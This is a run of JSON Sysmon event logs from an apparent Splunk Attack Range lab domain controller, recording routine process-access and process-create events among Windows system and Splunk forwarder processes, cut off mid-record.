{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4176,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.462\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.462","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4177,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.462\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.462","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4178,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.462\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.462","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4179,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.462\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.462","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4180,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.462\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.462","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4181,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.462\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.462","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4182,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.462\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1110-5F25-0000-001014F80500}\r\nTargetProcessId: 3800\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.462","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1110-5F25-0000-001014F80500}","TargetProcessId":"3800","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4183,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.603\r\nSourceProcessGUID: {E2A3D6B1-1110-5F25-0000-001014F80500}\r\nSourceProcessId: 3800\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.603","SourceProcessGUID":"{E2A3D6B1-1110-5F25-0000-001014F80500}","SourceProcessId":"3800","SourceThreadId":"4500","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4184,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.136\r\nProcessGuid: {E2A3D6B1-1111-5F25-0000-001045FA0500}\r\nProcessId: 3068\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nFileVersion: 8.0.2\r\nDescription: Monitor windows event logs\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winevtlog.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 